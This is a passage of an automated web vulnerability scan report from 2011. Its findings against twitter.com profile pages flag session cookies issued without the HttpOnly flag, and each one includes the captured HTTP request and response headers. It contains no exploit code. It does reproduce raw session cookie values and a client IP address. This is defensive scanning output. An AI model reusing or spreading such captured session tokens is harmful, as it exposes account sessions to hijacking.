X-Transaction: 1296225060-13968-5956
ETag: "b0e4ae48560abd6de3188c44a0de9618"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01122
Content-Type: text/html; charset=utf-8
Content-Length: 49638
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.79. http://twitter.com/backstreetboys

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /backstreetboys

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /backstreetboys HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:48 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265308-18449-44248
ETag: "470b046c74671df35cc91c1d8792ddb5"
Last-Modified: Sat, 29 Jan 2011 01:41:48 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 47038
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.80. http://twitter.com/benmezrich

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /benmezrich

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /benmezrich HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265970-66900-52833
ETag: "c5b0a06ada9d5c4864087cf3c0c522b7"
Last-Modified: Sat, 29 Jan 2011 01:52:50 GMT
X-Runtime: 0.01562
Content-Type: text/html; charset=utf-8
Content-Length: 50003
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.81. http://twitter.com/bennadel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /bennadel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bennadel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:30 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225029-56076-61608
ETag: "241ca6186e49f64c12f595a689635dc8"
Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT
X-Runtime: 0.64571
Content-Type: text/html; charset=utf-8
Content-Length: 49758
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.82. http://twitter.com/bostonherald

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /bostonherald

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bostonherald HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:20 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265280-17400-32279
ETag: "e1a9ca3ce3850d33d8312521c7367bdc"
Last-Modified: Sat, 29 Jan 2011 01:41:20 GMT
X-Runtime: 0.00787
Content-Type: text/html; charset=utf-8
Content-Length: 38696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.83. http://twitter.com/business

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /business

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 28 Jan 2011 14:31:19 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296225079-95247-27498
Last-Modified: Fri, 28 Jan 2011 14:31:19 GMT
Location: http://business.twitter.com/
X-Runtime: 0.01339
Content-Type: text/html; charset=utf-8
Content-Length: 94
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://business.twitter.com/">redirected</a>.</body></html>

11.84. http://twitter.com/cjronson

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /cjronson

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cjronson HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:02 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266042-1314-53197
ETag: "57db21f7394d7e31ecaad1a1f749d095"
Last-Modified: Sat, 29 Jan 2011 01:54:02 GMT
X-Runtime: 0.01554
Content-Type: text/html; charset=utf-8
Content-Length: 51916
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.85. http://twitter.com/cowboy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /cowboy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cowboy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:31:00 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225060-85333-1036
ETag: "257ca8de3359b561c58908e572d9840c"
Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT
X-Runtime: 0.01434
Content-Type: text/html; charset=utf-8
Content-Length: 52646
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.86. http://twitter.com/creationix

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /creationix

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /creationix HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225038-68082-17773
ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c"
Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT
X-Runtime: 0.01145
Content-Type: text/html; charset=utf-8
Content-Length: 52514
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.87. http://twitter.com/dandenney

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /dandenney

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dandenney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225059-14036-20243
ETag: "b216b5fbcf2d794e1118d2a88b30a946"
Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT
X-Runtime: 0.01217
Content-Type: text/html; charset=utf-8
Content-Length: 54426
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.88. http://twitter.com/danwrong

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /danwrong

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /danwrong HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:44 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225044-52425-1613
ETag: "e308391ad5a4a27e5094e4fd0c33693a"
Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT
X-Runtime: 0.01151
Content-Type: text/html; charset=utf-8
Content-Length: 50051
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.89. http://twitter.com/davevogler

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /davevogler

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /davevogler HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
